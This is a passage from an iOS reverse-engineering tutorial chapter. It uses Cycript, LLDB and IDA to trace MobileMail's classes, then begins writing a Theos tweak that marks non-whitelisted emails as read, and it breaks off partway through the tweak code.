command “choose ” without using recursiveDescription.  
FunMaker -5:~ root# cycript -p MobileMail  
cy# choose(MailboxContentViewCell)  
[#"<MailboxContentViewCell: 0x161f4000> cellContent",#"<MailboxContentViewCell: 
0x1621c400> cellContent",#" <MailboxContentViewCell: 0x1621d000> 
cellContent",#"<MailboxContentViewCell: 0x16234800> 
cellContent",#"<MailboxContentViewCell: 0x1623ee00> 
cellContent",#"<MailboxContentViewCell: 0x1623f200> 
cellContent",#"<MailboxContentViewCell: 0x159c2c00> cellContent "] 
“choose ” has returned an NSArray of MailboxContentViewCell objects. Pick anyone and 
keep calling nextResponder. 
cy# [choose(MailboxContentViewCell)[0] nextResponder]  
#"<UITableViewWrapperView: 0x15660b80; frame = (0 0; 320 612); gestureRecognizers = 
<NSArray: 0x16855170>; layer = <CALayer: 0x16888f20>; contentOffset: {0, 0}; 
contentSize: {320, 612}>"  
cy# [#0x15660b80 nextResponder]  
#"<MFMailboxTableView: 0x16095000; baseClass = UITableView; frame = (0 0; 320 568); 
clipsToBounds = YES; autoresize = W+H;  gestureRecognizers = <NSArray: 0x15607850>; layer 
= <CALayer: 0x16838210>; contentOffset: {0, -64}; contentSize: {320, 52364}>"  
Its associated UITableView is an MFMailboxTableView object. Let ’s take a look at its 
delegate.  
cy# [#0x16095000 delegate]  
#"<MailboxContentViewController: 0x16106000>"  
Its delegate is MailboxContentViewController. Keep calling nextResonder and find what its 
controller is.  
cy# [#0x16095000 nextResponder]  

 
284 #"<MailboxContentViewController: 0x16106000>"  
From the output, we can see that both the controller and delegate of MFMailboxTableView 
are MailboxContentViewController. Let ’s validate the controller as below.  
cy# [#0x16106000 setTitle:@"iOSRE"]  
The effect is shown in 8 -12. 
  
Figure 8-  11 After setTitle:  
So far, we can confirm that our deduction is correct. Playing 2 important roles at the same 
time, it is very likely that we can find both the refresh completion event handler and inbox 
reading method in MailboxContentViewController. Let ’s focus on this class from now on.  
8.2.5   Locate the refresh completion callback method in 
MailboxContentViewController  
Like what we did in Chapter 7, we should take a look at what protocol does 
MailboxContentViewController confirm to at first and then try to find our target me thod.  
@interface MailboxContentViewController : UIViewController 
<MailboxContentSelectionModelDataSource, MFSearchTextParserDelegate, 
MessageMegaMallObserver, MFAddressBookClient, MFMailboxTableViewDelegate, 
UIPopoverPresentationControllerDelegate, UITable ViewDelegate, UITableViewDataSource, 
UISearchDisplayDelegate, UISearchBarDelegate, TransferMailboxPickerDelegate, 
AutoFetchControllerDataSource>  
We can exclude MFSearchTextParserDelegate, MFAddressBookClient, 
UIPopoverPresentationControllerDelegate, UITableViewDelegate, UITableViewDataSource, 

 
285 UISearchDisplayDelegate and UISearchBarDelegate just by name, because they seemingly have 
no relation with refresh completion. The rest protocols, 
MailboxContentSelectionModelDataSource, MessageMegaMallObserver, 
MFMailboxTableViewDelegate, TransferMailboxPickerDelegate and 
AutoFetchControllerDataSource are hard to determine by names. Let ’s check them one by one  
from MailboxContentSelectionModelDataSource.  
@protocol MailboxContentSelectionModelDataSource <NSObject>  
- (BOOL)selectionModel:(id)arg1 deleteMovesToTrashForTableIndexPath:(id)arg2;  
- (void)selectionModel:(id)arg1 getConversationStateAtTableIndexPath:(id )arg2 
hasUnread:(char *)arg3 hasUnflagged:(char *)arg4;  
- (void)selectionModel:(id)arg1 getSourceStateHasUnread:(char *)arg2 hasUnflagged:(char 
*)arg3; 
- (id)selectionModel:(id)arg1 indexPathForMessageInfo:(id)arg2;  
- (id)selectionModel:(id)arg1 messageInf osAtTableIndexPath:(id)arg2;  
- (id)selectionModel:(id)arg1 messagesForMessageInfos:(id)arg2;  
- (BOOL)selectionModel:(id)arg1 shouldArchiveByDefaultForTableIndexPath:(id)arg2;  
- (id)selectionModel:(id)arg1 sourceForMessageInfo:(id)arg2;  
- (BOOL)selectionMod el:(id)arg1 supportsArchivingForTableIndexPath:(id)arg2;  
- (id)sourcesForSelectionModel:(id)arg1;  
@end 
It looks like the function of this protocol is to read the data source rather than refresh it. 
Let’s move on to MessageMegaMallObserver, its contents ar e as below:  
@protocol MessageMegaMallObserver <NSObject>  
- (void)megaMallCurrentMessageRemoved:(id)arg1;  
- (void)megaMallDidFinishSearch:(id)arg1;  
- (void)megaMallDidLoadMessages:(id)arg1;  
- (void)megaMallFinishedFetch:(id)arg1;  
- (void)megaMallGrowingMailboxesChanged:(id)arg1;  
- (void)megaMallMessageCountChanged:(id)arg1;  
- (void)megaMallMessagesAtIndexesChanged:(id)arg1;  
- (void)megaMallStartFetch:(id)arg1;  
@end 
There are many perfect tense verbs in the method names. Meanwhile, judging from the 
name like “LoadMessages ”, “FinishedFetch”  and “ MessageCountChanged ”, we guess that they 
may get called before or after refresh completion. So let ’s set breakpoints at the b eginning of 
these three methods using LLDB and pull to refresh the inbox to check if these methods are 
called. In the first place, attach LLDB to MobileMail and inspect its ASLR offset.  
(lldb) image list -o -f 
[  0] 0x000b2000 
/private/var/db/stash/_.lnBgU 8/Applications/MobileMail.app/MobileMail(0x00000000000b6000
) 
[  1] 0x003b7000 /Library/MobileSubstrate/MobileSubstrate.dylib(0x00000000003b7000)  
[  2] 0x090d1000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1 
(12B411)/Symbols/usr/lib/libar chive.2.dylib  
[  3] 0x090c3000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1.1 
(12B435)/Symbols/System/Library/Frameworks/CloudKit.framework/CloudKit  
...... 
 
286 We can see the ASLR offset is 0x000b2000. Then drag and drop MobileMail into IDA and  
after the initial analysis has been finished, check the base addresses of 
[MailboxContentViewController megaMallDidLoadMessages:], 
[MailboxContentViewController megaMallFinishedFetch:] and 
[MailboxContentViewController megaMallMessageCountChanged:], as sh own in figure 8- 13, 8-
14 and 8 -15. 
  
Figure 8-  12 [MailboxContentViewController megaMallDidLoadMessages:]  
  
Figure 8-  13 [MailboxContentViewController megaMallFinishedFetch:]  
  
Figure 8-  14 [MailboxContentViewController megaMallMessageCountChanged:]  
Their base addresses are 0x3dce0, 0x3d860 and 0x3de48 respectively. Set breakpoints on 
these addresses with LLDB and refresh the inbox to trigger the breakpoints:  
(lldb) br s –a ‘0x000b2000+0x3dc e0’ 
Breakpoint 1: where = MobileMail`___lldb_unnamed_function992$$MobileMail, address = 
0x000efce0  
(lldb) br s -a ‘0x000b2000+0x3d860’  
Breakpoint 2: where = MobileMail`___lldb_unnamed_function987$$MobileMail, address = 
0x000ef860  
(lldb) br s -a ‘0x000b2000 +0x3de48’  
Breakpoint 3: where = MobileMail`___lldb_unnamed_function993$$MobileMail, address = 
0x000efe48  
Some of you may meet the same problem as me, which is none of three breakpoints get 

 
287 triggered. If you have experience in network development, you may have the idea that in order 
to reduce the burden of servers and save the network traffic of iOS, Mail may not fetch emails 
remotely on every refresh. If the time interval between two refreshes is very short, it will use 
cached content as data source of inb ox; and as a result, methods in MessageMegaMallObserver 
will not get called. In order to validate our assumption, send an email to yourself and refresh to check whether breakpoints get triggered:  
Process 73130 stopped  
* thread #44: tid = 0x14c10, 0x000ef86 0 
MobileMail`___lldb_unnamed_function987$$MobileMail, stop reason = breakpoint 2.1  
    frame #0: 0x000ef860 MobileMail`___lldb_unnamed_function987$$MobileMail  
MobileMail`___lldb_unnamed_function987$$MobileMail:  
-> 0xef860:  push   {r7, lr}  
   0xef862:  mov     r7, sp 
   0xef864:  sub    sp, #24  
   0xef866:  movw   r1, #44962  
(lldb) c  
Process 73130 resuming  
Process 73130 stopped  
* thread #44: tid = 0x14c10, 0x000ef860 
MobileMail`___lldb_unnamed_function987$$MobileMail, stop reason = breakpoint 2.1  
    frame #0: 0x000ef860 MobileMail`___lldb_unnamed_function987$$MobileMail  
MobileMail`___lldb_unnamed_function987$$MobileMail:  
-> 0xef860:  push   {r7, lr}  
   0xef862:  mov    r7, sp  
   0xef864:  sub    sp, #24  
   0xef866:  movw   r1, #44962  
(lldb) c  
Process 73130 resuming  
Process 73130 stopped  
* thread #1: tid = 0x11daa, 0x000efe48 
MobileMail`___lldb_unnamed_function993$$MobileMail, queue = ‘MessageMiniMall.0x157c2d90, 
stop reason = breakpoint 3.1  
    frame #0: 0x000efe48 MobileMail`___lldb_unnamed_function993$$Mob ileMail 
MobileMail`___lldb_unnamed_function993$$MobileMail:  
-> 0xefe48:  push   {r4, r5, r6, r7, lr}  
   0xefe4a:  add    r7, sp, #12  
   0xefe4c:  push.w {r8, r10, r11}  
   0xefe50:  sub.w  r4, sp, #24  
(lldb)  
Process 73130 resuming  
Process 73130 stopped  
* thread #1: tid = 0x11daa, 0x000efe48 
MobileMail`___lldb_unnamed_function993$$MobileMail, queue = ‘MessageMiniMall.0x157c2d90, 
stop reason = breakpoint 3.1  
    frame #0: 0x000efe48 MobileMail`___lldb_unnamed_function993$$MobileMail  
MobileMail`___lldb_unnamed _function993$$MobileMail:  
-> 0xefe48:  push   {r4, r5, r6, r7, lr}  
   0xefe4a:  add    r7, sp, #12  
   0xefe4c:  push.w {r8, r10, r11}  
   0xefe50:  sub.w  r4, sp, #24  
(lldb)  
Process 73130 resuming  
Process 73130 stopped  
 
288 * thread #44: tid = 0x14c10, 0x000ef860 
MobileMail`___lldb_unnamed_function987$$MobileMail, stop reason = breakpoint 2.1  
    frame #0: 0x000ef860 MobileMail`___lldb_unnamed_function987$$MobileMail  
MobileMail`___lldb_unnamed_function987$$MobileMail:  
-> 0xef860:  push   {r7, lr}  
   0xef862:  mov    r7, sp  
   0xef864:  sub    sp, #24  
   0xef866:  movw   r1, #44962  
(lldb) c  
Process 73130 resuming  
As expected, megaMallFinishedFetch: and megaMallMessageCountChanged: are called 
alternately. From their names we can see that an email is a mess age, megaMallFinishedFetch: 
will be called when iOS has fetched emails from servers successfully, and 
megaMallMessageCountChanged: will get called when email count changes, i.e. when we 
receive or delete emails. These two methods will definitely get called  after refreshing; we can 
choose either one as the refresh completion callback method. We ’ll take 
megaMallMessageCountChanged: in this chapter and our next task is to find the method for 
getting all emails.  
8.2.6   Get all emails from MessageMegaMall  
Do you still remember the saying in chapter 7 that “The reason a protocol method gets 
called is generally that the corresponding event mentioned in the method name happened. And 
the thing that triggers the event is usually the method ’s arguments ”? So let ’s delete the first two 
breakpoints and keep the last one on megaMallMessageCountChanged:, and take a look at its 
argument: 
Process 73130 stopped  
* thread #1: tid = 0x11daa, 0x000efe48 
MobileMail`___lldb_unnamed_function993$$MobileMail, queue = ‘MessageMiniM all.0x157c2d90, 
stop reason = breakpoint 3.1  
    frame #0: 0x000efe48 MobileMail`___lldb_unnamed_function993$$MobileMail  
MobileMail`___lldb_unnamed_function993$$MobileMail:  
-> 0xefe48:  push   {r4, r5, r6, r7, lr}  
   0xefe4a:  add    r7, sp, #12  
   0xefe4c:  push.w {r8, r10, r11}  
   0xefe50:  sub.w  r4, sp, #24  
(lldb) po $r2  
NSConcreteNotification 0x157e8af0 {name = MegaMallMessageCountChanged; object = 
<MessageMegaMall: 0x1576c320>; userInfo = {  
    "added-message-infos" =     (  
        "<MFMessa geInfo: 0x157c86d0> uid=1185, conversation=2777228998582613276"  
    ); 
    destination = "{( \n)}"; 
    inserted = "{( \n    <NSIndexPath: 0x157e8ac0> {length = 2, path = 0 - 0}\n)}"; 
    relocated = "{( \n)}"; 
    updated = "{( \n)}"; 
}} 
 
289 We can see that the argument is an NSConcreteNotification object. Checking its header file, 
we can learn that it inherits from NSNotification. Its name is MegaMallMessageCountChanged, 
object is MessageMegaMall and userInfo is its changelog. The thing that interests us is the name 
“MegaMall ”, which seemingly has nothing to do with emails but is always next to “Message ”, so 
I guess it ’s a mega mall for emails instead of merchandises. Let ’s see what ’s in 
MessageMegaMall.h:  
@interface MessageMegaMall : NSObject < MessageMiniMallObserver, 
MessageSelectionDataSource>  
...... 
- (id)copyAllMessages;  
@property (retain, nonatomic) MFMailMessage *currentMessage;  
- (void)loadOlderMessages;  
- (unsigned int)localMessageCount;  
- (unsigned int)messageCount;  
- (void)markAllMessagesAsNotViewed;  
- (void)markAllMessagesAsViewed;  
- (void)markMessagesAsNotViewed:(id)arg1;  
- (void)markMessagesAsViewed:(id)arg1;  
...... 
@end 
We’ve got some new clues: copyAllMessages, currentMessage, loadOlderMessages, 
localMessageCount, me ssageCount, markAllMessagesAsViewed, etc. From these methods and 
properties, we can confirm that MessageMegaMall is a model class in charge of all emails; a 
mega mall is a vivid analogy from Apple for its responsibility. So, can we get all emails with 
copy AllMessages? Let ’s try it out in LLDB:  
Process 73130 stopped  
* thread #1: tid = 0x11daa, 0x000efe48 
MobileMail`___lldb_unnamed_function993$$MobileMail, queue = ‘MessageMiniMall.0x157c2d90, 
stop reason = breakpoint 3.1  
    frame #0: 0x000efe48 MobileMail`__ _lldb_unnamed_function993$$MobileMail  
MobileMail`___lldb_unnamed_function993$$MobileMail:  
-> 0xefe48:  push   {r4, r5, r6, r7, lr}  
   0xefe4a:  add    r7, sp, #12  
   0xefe4c:  push.w {r8, r10, r11}  
   0xefe50:  sub.w  r4, sp, #24  
(lldb) po [[$r2 object] copyAllMessages]  
{( 
    <MFLibraryMessage 0x15612030: library id 89, remote id 13020, 2014 -11-25 20:32:16 
+0000, ‘Cydia/APT(A): LowPowerBanner (1.4.5)’>,  
    <MFLibraryMessage 0x1572ef10: library id 604, remote id 12718, 2014 -10-01 21:34:28 
+0000, ‘Asian M orning: Told to End Protests, Organizers in Hong Kong Vow to Expand 
Them’>, 
    <MFLibraryMessage 0x168bd170: library id 906, remote id 13142, 2014 -12-17 22:34:30 
+0000, ‘Asian Morning: Obama Announces U.S. and Cuba Will Resume Relations’>,  
...... 
)} 
(lldb) p (int)[[[$r2 object] copyAllMessages] count]  
(int) $7 = 580  
(lldb) p (int)[[$r2 object] localMessageCount]  
 
290 (int) $8 = 580  
(lldb) p (int)[[$r2 object] messageCount]  
(int) $0 = 553  
(lldb) po [[[$r2 object] copyAllMessages] class]  
__NSSetM  
copyAllMessages has  returned an NSSet with 580 MFLibraryMessage objects. There is an 
email summary in each MFLibraryMessage object and the count of this NSSet is the same to 
localMessageCount. Actually, 580 is far less than all email count, but this number is reasonable 
that to save network traffic and local storage, iOS doesn ’t have to really fetch all emails and 
store them locally, several hundreds of emails would be enough. If users want to read more, iOS will fetch more with loadOlderMessages. Therefore, copyAllMessages c an be considered the 
right method for getting all emails. Aha, we have achieved our 2nd goal. For the 3rd goal, we should pay attention to [MessageMegaMall markMessagesAsViewed:]. If nothing goes wrong, 
this is the method for marking emails as read and its  argument seems to be an NSArray or NSSet 
with MFLibraryMessage objects. Is that so? We ’ll see shortly. 
8.2.7  Get sender address from MFLibraryMessage and mark email as 
read using MessageMegaMall  
From the analysis in section 8.2.4, we can see that an emai l is an MFLibraryMessage object, 
whose description contains the summary of that email. However, you can ’t find 
MFLibraryMessage.h in MobileMail headers. Why? Because MFLibraryMessage originates from 
an external dylib. Search “MFLibraryMessage ” in iOS 8 class -dump headers, you will find it in 
Messages.framework, as shown in figure 8 -16. 
  
Figure 8-  15 Find MFLibraryMessage  
Take a look at MFLibraryMessage.h:  

 
291 @interface MFLibraryMessage : MFMailMessage  
...... 
- (id)copyMessageInf o; 
...... 
- (void)markAsNotViewed;  
- (void)markAsViewed;  
- (id)account;  
...... 
- (unsigned long long)uniqueRemoteId;  
- (unsigned long)uid;  
- (unsigned int)hash;  
- (id)remoteID;  
- (void)_updateUID;  
- (unsigned int)messageSize;  
- (id)originalMailboxURL;  
- (unsigned int)originalMailboxID;  
- (unsigned int)mailboxID;  
- (unsigned int)libraryID;  
- (id)persistentID;  
- (id)messageID;  
@end 
In MFLibraryMessage.h, there are various IDs, but our target information seems to be 
missing. This doesn ’t make sense: we have already found the email summary in the description 
of MFLibraryMessage, but haven’ t found the corresponding methods to read the summary in 
MFLibraryMessage.h. Therefore, something must be ignored in our analysis. Recheck 
MFLibraryMessage.h, we notice that there is  a method called copyMessageInfo. Let ’s take a 
look at it.  
Process 73130 stopped  
* thread #1: tid = 0x11daa, 0x000efe48 
MobileMail`___lldb_unnamed_function993$$MobileMail, queue = ‘MessageMiniMall.0x157c2d90, 
stop reason = breakpoint 3.1  
    frame #0: 0x00 0efe48 MobileMail`___lldb_unnamed_function993$$MobileMail  
MobileMail`___lldb_unnamed_function993$$MobileMail:  
-> 0xefe48:  push   {r4, r5, r6, r7, lr}  
   0xefe4a:  add    r7, sp, #12  
   0xefe4c:  push.w {r8, r10, r11}  
   0xefe50:  sub.w  r4, sp, #24  
 (lldb) po [[[[$r2 object] copyAllMessages] anyObject] copyMessageInfo]  
<MFMessageInfo: 0x157c8040> uid=89, conversation=594030790676622907  
We’ve got an object of MFMessageInfo, which has been mentioned in section 8.2.5. Is email 
summary in MFMessageInfo.h? Let ’s try it.  
@interface MFMessageInfo : NSObject  
{ 
    unsigned int _flagged:1;  
    unsigned int _read:1;  
    unsigned int _deleted:1;  
    unsigned int _uidIsLibraryID:1;  
    unsigned int _hasAttachments:1;  
    unsigned int _isVIP:1;  
    unsigned int _uid;  
    unsigned int _dateReceivedInterval;  
 
292     unsigned int _dateSentInterval;  
    unsigned int _mailboxID;  
    long long _conversationHash;  
    long long _generationNumber;  
} 
 
+ (long long)newGenerationNumber;  
@property(readonly, nonatomic) long long generationNumber; // @synthesize 
generationNumber=_generationNumber;  
@property(nonatomic) unsigned int mailboxID; // @synthesize mailboxID=_mailboxID;  
@property(nonatomic) long long conversationHash; // @synthesize 
conversationHash=_conversationHash;  
@property(nonatomic) unsigned int dateSentInterval; // @synthesize 
dateSentInterval=_dateSentInterval;  
@property(nonatomic) unsigned int dateReceivedInterval; // @synthesize 
dateReceivedInterval=_dateReceivedInterval;  
@property(nonatomic) unsigned int uid; // @ synthesize uid=_uid;  
- (id)description;  
- (unsigned int)hash;  
- (BOOL)isEqual:(id)arg1;  
- (int)generationCompare:(id)arg1;  
- (id)initWithUid:(unsigned int)arg1 mailboxID:(unsigned int)arg2 
dateReceivedInterval:(unsigned int)arg3 dateSentInterval:(unsigned int)arg4 
conversationHash:(long long)arg5 read:(BOOL)arg6 knownToHaveAttachments:(BOOL)arg7 
flagged:(BOOL)arg8 isVIP:(BOOL)arg9;  
- (id)init;  
@property(nonatomic) BOOL isVIP;  
@property(nonatomic, getter=isKnownToHaveAttachments) BOOL knownToHaveAttachments;  
@property(nonatomic) BOOL uidIsLibraryID;  
@property(nonatomic) BOOL deleted;  
@property(nonatomic) BOOL flagged;  
@property(nonatomic) BOOL read;  
 
@end 
MFMessageInfo can tell if an email is read, but it still doesn ’t contain the summary. Go back 
to MFLibraryMessage.h again, we see it inherits from MFMailMessage. Judging from its name, 
MailMessage is certainly more appropriate to represent an email than LibraryMessage. Take a 
look at MFMailMessage.h:  
@interface MFMailMessage : MFMessage  
...... 
- (BOOL)sho uldSetSummary;  
- (void)setSummary:(id)arg1;  
- (void)setSubject:(id)arg1 to:(id)arg2 cc:(id)arg3 bcc:(id)arg4 sender:(id)arg5 
dateReceived:(double)arg6 dateSent:(double)arg7 messageIDHash:(long long)arg8 
conversationIDHash:(long long)arg9 summary:(id)arg10 withOptions:(unsigned int)arg11;  
- (id)subject;  
@end 
summary, subject, sender, cc, bcc and some other frequently used phrases in emails come 
into our eyes. However, except subject, most of them are only setters, where are the getters? If 
you still remembe r how we ’ve shifted our attention from MFLibraryMessage.h to 
MFMailMessage.h, you will notice that MFMailMessage inherits from MFMessage. Before 
 
293 inspecting MFMessage.h, let ’s take a look at the return value of [MFMailMessage subject] 
through LLDB to verify  the analysis by now.  
Process 73130 stopped  
* thread #1: tid = 0x11daa, 0x000efe48 
MobileMail`___lldb_unnamed_function993$$MobileMail, queue = ‘MessageMiniMall.0x157c2d90, 
stop reason = breakpoint 3.1  
    frame #0: 0x000efe48 MobileMail`___lldb_unnamed_fun ction993$$MobileMail  
MobileMail`___lldb_unnamed_function993$$MobileMail:  
-> 0xefe48:  push   {r4, r5, r6, r7, lr}  
   0xefe4a:  add    r7, sp, #12  
   0xefe4c:  push.w {r8, r10, r11}  
   0xefe50:  sub.w  r4, sp, #24  
(lldb) po [[[[$r2 object] copyAllMessages]  anyObject] subject]  
Asian Morning: Told to End Protests, Organizers in Hong Kong Vow to Expand Them  
We can see that the return value of [MFMailMessage subject] is exactly the email title. Take 
a look at MFMessage.h (Attention, MFMessage is a class in MIM E.framework). 
@interface MFMessage : NSObject <NSCopying>  
...... 
- (id)headerData;  
- (id)bodyData;  
- (id)summary;  
- (id)bccIfCached;  
- (id)bcc;  
- (id)ccIfCached;  
- (id)cc; 
- (id)toIfCached;  
- (id)to; 
- (id)firstSender;  
- (id)sendersIfCached;  
- (id)senders;  
- (id)dateSent;  
- (id)subject;  
- (id)messageData;  
- (id)messageBody;  
- (id)headers;  
...... 
@end 
to, sender, subject, messageBody, getters for all email information are available now. It ’s 
time to check their values with LLDB.  
Process 73130 stopped  
* thread #1: tid = 0x11daa, 0x000efe48 
MobileMail`___lldb_unnamed_function993$$MobileMail, queue = ‘MessageMiniMall.0x157c2d90, 
stop reason = breakpoint 3.1  
    frame #0: 0x000efe48 MobileMail`___lldb_unnamed_function993$$MobileMail  
MobileMail`___lldb_unnamed_function9 93$$MobileMail:  
-> 0xefe48:  push   {r4, r5, r6, r7, lr}  
   0xefe4a:  add    r7, sp, #12  
   0xefe4c:  push.w {r8, r10, r11}  
   0xefe50:  sub.w  r4, sp, #24  
 (lldb) po [[[[$r2 object] copyAllMessages] anyObject] firstSender]  
NYTimes.com < nytdirect@nytimes.com>  
(lldb) po [[[[$r2 object] copyAllMessages] anyObject] sendersIfCached]  
<__NSArrayI 0x16850850>(  
 
294 NYTimes.com <nytdirect@nytimes.com>  
) 
 
(lldb) po [[[[$r2 object] copyAllMessages] anyObject] senders]  
<__NSArrayI 0x16850850>(  
NYTimes.co m <nytdirect@nytimes.com>  
) 
 
(lldb) po [[[[$r2 object] copyAllMessages] anyObject] to]  
<__NSArrayI 0x16850840>(  
snakeninny@gmail.com  
) 
 
(lldb) po [[[[$r2 object] copyAllMessages] anyObject] dateSent]  
2014-10-01 21:30:32 +0000  
(lldb) po [[[[$r2 object] copy AllMessages] anyObject] subject]  
Asian Morning: Told to End Protests, Organizers in Hong Kong Vow to Expand Them  
(lldb) po [[[[$r2 object] copyAllMessages] anyObject] messageBody]  
<MFMimeBody: 0x16852fc0>  
Everything is too distinct to explain. firstSender returns a single sender, while 
sendersIfCached and senders both return an NSArray, which means on iOS, there could be 
multiple senders in an email. Although this situation is quite rare (at least for me, I have never 
seen multiple senders), to avoid missing any sender, I ’ll still use “ senders”  to get all possible 
senders. The final task is to mark messages as read; do you still remember [MessageMegaMall markMessagesAsViewed:] in section 8.2.5? Is it the right method for marking messages as read?  
Let’s set a breakpoint on this method and check whether it will be called when we mark an 
email as read.  
At first, we need to locate [MessageMegaMall markMessagesAsViewed:] in IDA and check 
its base address, as shown in figure 8- 17. 
  
Figure 8-  16 [MessageMegaMall markMessagesAsViewed:]  
Its base address is 0x13b648. Since the ASLR offset of MobileMail is 0xb2000, we can set a 
breakpoint like this: 
(lldb) br s -a ‘0x000b2000+0x0013B648’  
Breakpoint 4: where = MobileMail`___lldb_unnamed_function7357$$MobileMail, address = 
0x001ed648  
Process 103910 stopped  
* thread #1: tid = 0x195e6, 0x001ed648 
MobileMail`___lldb_unnamed_function7357$$MobileMail, queue = ‘com.apple.main -thread, 
stop reason = breakpoint 4.1  

 
295     frame #0: 0x001df648 MobileMail`___lldb_unnamed_function7357$$MobileMail  
MobileMail`___lldb_unnamed_function7357$$MobileMail:  
-> 0x1ed648:  push   {r4, r5, r6, r7, lr}  
   0x1ed64a:  add    r7, sp, #12  
   0x1ed64c:  str    r8, [sp, # -4]! 
   0x1ed650:  mov    r8, r0  
(lldb) po $r2  
{( 
    <MFLibraryMessage 0x157b70b0: library id 906, remote id 13142, 2014 -12-17 22:34:30 
+0000, ‘Asian Morning: Obama Announces U.S. and Cuba Will Resume Relations’>  
)} 
(lldb) po [$r2 class]  
__NSSetI  
The output o f LLDB validates our assumption. [MessageMegaMall 
markMessagesAsViewed:] is the right method for marking messages as read and its argument is 
an NSSet of MFLibraryMessage objects. Till now, we have successfully added the whitelist 
button, captured the refr esh completion event, got all emails and their senders, as well marked 
them as read. Tweak prototyping comes to an end; let ’s comb our thoughts before writing code.  
8.3   Result interpretation  
The practice in this chapter is highly modularized; every part in Mai l has a clear division of 
work, which speeds up our tweak prototyping.  
1.   Find the place and method for adding whitelist button  
Sticking to the pursuit of both understandability and harmony, we have tried several 
solutions and finally decided to put the whitelist button at the top left corner of “Mailboxes ” 
view. We were  all familiar with the pattern to get MailboxPickerController with Cycript, so 
there was  no difficulty for us to add a button on its navigation bar.  
2.   Find the refresh completion callback methods in protocol  
Again in this chapter, we ’ve used the protocols in MailboxContentViewController.h as 
clues, walked through all corresponding headers and guessed the keywords, then finally found 
the refresh completion callback methods, just like what we ’ve done in “ find a method to 
monitor note text changes in real time” , chapter 7. After testing, 
megaMallMessageCountChanged: was called when email count changes, thus met our 
requirements.  
 
296 3.   Get all emails from MessageMegaMall. 
According to the experience that “The reason a protocol method gets called is generally that 
the corresponding event mentioned in the method name happened. And the thing that triggers 
the event is usually the method ’s arguments ”, we’ ve found class MessageMegaMall from the 
argument of megaMallMessageCountChanged:. The name, MegaMall, was very obscure. With 
wild guesses and programmatic checks, we ’ve discovered that it was the model for email 
managements. By calling [MessageMegaMall copyAllMessages], we could  get all emails.  
4.   Get the sender’s address from MFLibraryMessage 
 [MessageMegaMall copyAllMessages] return ed an array of MFLibraryMessage objects. By 
inspecting MFLibraryMessage.h and related headers, as well testing some suspicious properties 
and methods, we could  easily get the sender ’s addresses from this class.  
5.   Mark emails as read with MessageMegaMall 
When we were studying MessageMegaMall.h, we have noticed the uncertain target 
method, markMessagesAsViewed:. We could even say for sure it was what we were looking for 
without any test. Of course, the result from LLDB p roved our conclusion directly.  
Notice: In order to simplify the tweak, the whitelist in section 8.4 consists of only one single 
email address, and it ’s presented as a UIAlertView. As an exercise, it ’s your turn to extend it with 
more addresses and use a UI TableView to present it, make this tweak more useful.  
8.4   Tweak writing  
All difficulties have been overcome during the stage of prototyping. Now we just need to 
follow the conclusion we get in section 8.3 and write the tweak with elegant code.  
8.4.1  Create tw eak project “iOSREMailMarker ” using  Theos  
The Theos commands are as follows:  
hangcom- mba:Documents sam$ /opt/theos/bin/nic.pl  
NIC 2.0 -  New Instance Creator 
------------------------------  
  [1.] iphone/application  
  [2.] iphone/cydget  
  [3.] iphone/framework  
  [4.] iphone/library  
 
297   [5.] iphone/notification_center_widget  
  [6.] iphone/preference_bundle  
  [7.] iphone/sbsettingstoggle  
  [8.] iphone/tool  
  [9.] iphone/tweak  
  [10.] iphone/xpc_service  
Choose a Template (required): 9  
Project Name (required): iOSREMailMarker  
Package Name [com.yourcompany.iosremailmarker]: com.iosre.mailmarker  
Author/Maintainer Name [sam]: sam  
[iphone/tweak] MobileSubstrate Bundle filter [com.apple.springboard]: 
com.apple.mobilemail  
[iphone/tweak] List of applic ations to terminate upon installation (space -separated, ‘ -’ 
for none) [SpringBoard]: MobileMail  
Instantiating iphone/tweak in iosremailmarker/...  
Done. 
8.4.2   Compose iOSREMailMarker.h  
The finalized iOSREMailMarker.h looks like this:  
@interface MailboxPickerController : UITableViewController  
@end 
 
@interface NSConcreteNotification : NSNotification  
@end 
 
@interface MessageMegaMall : NSObject  
- (void)markMessagesAsViewed:(NSSet *)arg1;  
- (NSSet *)copyAllMessages;  
@end 
 
@interface MFMessageInfo : NS Object 
@property (nonatomic) BOOL read;  
@end 
 
@interface MFLibraryMessage : NSObject  
- (NSArray *)senders;  
- (MFMessageInfo *)copyMessageInfo;  
@end 
This header is composed by picking snippets from other class -dump headers. The existence 
of this header is simply for avoiding any warnings or errors when compiling the tweak.  
8.4.3   Edit Tweak.xm  
The finalized Tweak.xm looks like this:  
#import "iOSREMai lMarker.h"  
 
%hook MailboxPickerController  
%new 
- (void)iOSREShowWhitelist  
{ 
 UIAlertController *alertController = [UIAlertController 
alertControllerWithTitle:@"Whitelist" message:@"Please input an email address" 
preferredStyle:UIAlertControllerStyleAlert];  
 
298  UIAlertAction *okAction = [UIAlertAction actionWithTitle:@"OK" 
style:UIAlertActionStyleDefault handler:^(UIAlertAction * action) {  
  UITextField *whitelistField = alertController.textFields.firstObject;  
  if ([whitelistField.text length] != 0) [[NSUserDe faults standardUserDefaults] 
setObject:whitelistField.text forKey:@"whitelist"];  
 }]; 
 UIAlertAction *cancelAction = [UIAlertAction actionWithTitle:@"Cancel" 
style:UIAlertActionStyleCancel handler:nil];  
 [alertController addAction:okAction];  
 [alertController addAction:cancelAction];  
 [alertController addTextFieldWithConfigurationHandler:^(UITextField *textField) {  
  textField.placeholder = @"snakeninny@gmail.com";  
  textField.text = [[NSUserDefaults standardUserDefaults] 
objectForKey:@"whiteli st"]; 
 }]; 
 [self presentViewController:alertController animated:YES completion:nil];  
} 
 
- (void)viewWillAppear:(BOOL)arg1  
{ 
 self.navigationItem.leftBarButtonItem = [[[UIBarButtonItem alloc] 
initWithTitle:@"Whitelist" style:UIBarButtonItemStylePlain targe t:self 
action:@selector(iOSREShowWhitelist)] autorelease];  
 %orig; 
} 
%end 
 
%hook MailboxContentViewController  
- (void)megaMallMessageCountChanged:(NSConcreteNotification *)arg1  
{ 
 %orig; 
 NSMutableSet *targetMessages = [NSMutableSet setWithCapacity:600];  
 NSString *whitelist = [[NSUserDefaults standardUserDefaults] 
objectForKey:@"whitelist"];  
 MessageMegaMall  *mall = [arg1 object];  
 NSSet *messages = [mall copyAllMessages]; // Remember to release it later  
 for (MFLibraryMessage *message in messages)  
 { 
  MFMessageInfo *messageInfo = [message copyMessageInfo]; // Remember to 
release it later  
